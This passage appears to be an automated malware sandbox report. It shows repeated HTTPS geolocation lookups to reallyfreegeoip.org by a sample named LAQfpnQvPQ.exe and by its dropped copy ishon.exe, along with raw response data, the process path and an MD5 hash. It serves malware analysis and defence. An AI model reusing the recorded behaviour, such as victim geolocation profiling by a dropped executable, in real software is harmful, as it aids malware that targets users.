                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549778172.67.177.1344436364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:42 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:43 UTC853INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:43 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507092
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Foso6UdlwrIC%2BT4ky0CYF2ssoI%2FchI0MkRMEyFpKyRgD7vAsyd1W%2Fsg8o%2Fdc2CKT7rHxo1Gk36uZqTCLI6Pbf6gY8hRHJZgA3tX5cAuBmZkNDVhDOV0i09iscpzP1rlIme8opOmw"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82292eca450f78-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1544&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1908496&cwnd=213&unsent_bytes=0&cid=c4a64ea99b6e011e&ts=503&x=0"
                                                                        2024-11-25 13:59:43 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.549792172.67.177.1344436184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:49 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:49 UTC861INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:49 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507098
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eu3UtLo6kj%2BIuQoWYNNx2a%2BoIquPfex7gEr98dX58AQVUyijYlF0Gl32OA8sURH6dKrT4kulLUIx5Xo%2BK%2BaT790zllaVI97BgpNfIqqBCZc%2BPpnQw%2FAy4G%2FVwEM%2B4HL2lhMLbGon"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8229575eec423d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1796&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1638608&cwnd=178&unsent_bytes=0&cid=cb92b6871ce9ed8c&ts=460&x=0"
                                                                        2024-11-25 13:59:49 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.549798172.67.177.1344436184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:51 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 13:59:52 UTC855INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:51 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507100
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pj7h16N%2BbHCzMqdKaccpcQZmGJ8VhOyef9Y%2FaJP%2FdpxjeqnxrCE9MHEpGTLNxHQxJ9%2B49IXVuhRr4uXQptyLo%2BsjV6P0ircbcK2KlpYkA5EYcLwFHKhy9o7vaHinteyCzYfBsIAj"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8229657efb41ef-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1708601&cwnd=192&unsent_bytes=0&cid=93865239cbfcdf0f&ts=566&x=0"
                                                                        2024-11-25 13:59:52 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.549808172.67.177.1344436184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:54 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:55 UTC859INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:54 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507103
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2BkN3h8WA66FBGLMvUbg4uio%2BRpgE8OWXDlZdlvPBmqzutKwJYxIVazB5NkzUrViynZz3xFvsxrznCpg%2FkCYGAyZFbiQLw%2BVaxJJm4o2tSr3Mp7VVE%2FllE%2B9bXi3bqlKb3idh%2BNQ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8229787cff4319-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1589&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1813664&cwnd=233&unsent_bytes=0&cid=21817bd943f6a40e&ts=463&x=0"
                                                                        2024-11-25 13:59:55 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.549815172.67.177.1344436184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:57 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:58 UTC851INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:57 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507106
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4abmzGYQ6cDQZ3%2Fa4DwSg3uvCB0vwdI0HYJ2VsK90kH8GpTlgl8d8f9rS6qz1k3lwrBjDJ8BSJ8UNUVFAaIx1qp7Rs9xosgMYJepiIxsEabzkRXYFsxq7NeX7wk%2BFOCC%2BnfreQBr"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82298b3f8d8c42-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2028&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1427872&cwnd=252&unsent_bytes=0&cid=16ed8ca676321ff2&ts=455&x=0"
                                                                        2024-11-25 13:59:58 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.549824172.67.177.1344436184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 14:00:00 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 14:00:01 UTC857INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:01 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507110
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=osG9alZByCiBvKZh6XrLlgCea6UcMqOCEfMgc3pUVYKmAsO0kbiJUHhO10Bfier%2BQ0MB5%2F2bLsOOhC%2FBQnc%2FD%2F1sKglXdPo0Wbn6yKylvPdyGhfuPjq637st%2F6OPZsIRLyvpc38x"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82299e8e277cee-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2082&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1446977&cwnd=180&unsent_bytes=0&cid=5682327a9fc0450c&ts=477&x=0"
                                                                        2024-11-25 14:00:01 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.549851172.67.177.1344436184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 14:00:12 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 14:00:12 UTC856INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:12 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507121
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqJZuMJs4JoegVqPiSHCYFD91p1WpLGFc8oBP9M5%2Bdm%2BxifZCNqMwhrgaJOBl4xM10UgqsmEQqWIeDBtPTQJ%2Fq4N7v9wwiMVznE5ICPZ%2F5s5%2BkkogLXEWMZaG6kPQRElU271Q3Gn"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8229e67a928c7d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10246&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1454907&cwnd=237&unsent_bytes=0&cid=7317ca52b3925124&ts=487&x=0"
                                                                        2024-11-25 14:00:12 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.549872172.67.177.1344436184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 14:00:20 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 14:00:20 UTC861INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:20 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507129
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZ%2F2sFBvYQz0V2Q2XoaFIDgtrS7iNL%2BNBN%2FqyhrEkisSFuTPUcwfilq2vXuSj5mKZd%2F%2FaGLEtqE%2FKLf%2Bv5XxnWorXIQ%2FRH4Hs2JZHR9ihthIsuhCxwFfUbLwjyLvElWEwuqSTJlz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e822a186aa6433f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1765417&cwnd=215&unsent_bytes=0&cid=f45118dd4e99f1a6&ts=492&x=0"
                                                                        2024-11-25 14:00:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.549889172.67.177.1344436184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 14:00:27 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 14:00:27 UTC857INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:27 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507136
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2dJjXlk5TTWgA4VCWyLFRTTOdFPK9%2B0TkZSan0OsPjmPITC0UkDf%2BvGeuQvnAiaj70TSAw%2BVjh%2B%2FPqkypv9bNfamZZ8olViOzsAqIBuGieRRNl1Tpusjq9tLKMS%2FesZLJeAHiiIL"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e822a44dce70f8f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1468&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1933774&cwnd=252&unsent_bytes=0&cid=68594e7d761e0814&ts=586&x=0"
                                                                        2024-11-25 14:00:27 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:08:59:00
                                                                        Start date:25/11/2024
                                                                        Path:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\LAQfpnQvPQ.exe"
                                                                        Imagebase:0xe00000
                                                                        File size:545'600 bytes
                                                                        MD5 hash:08565A4A256FB8F4F3497C695991829F
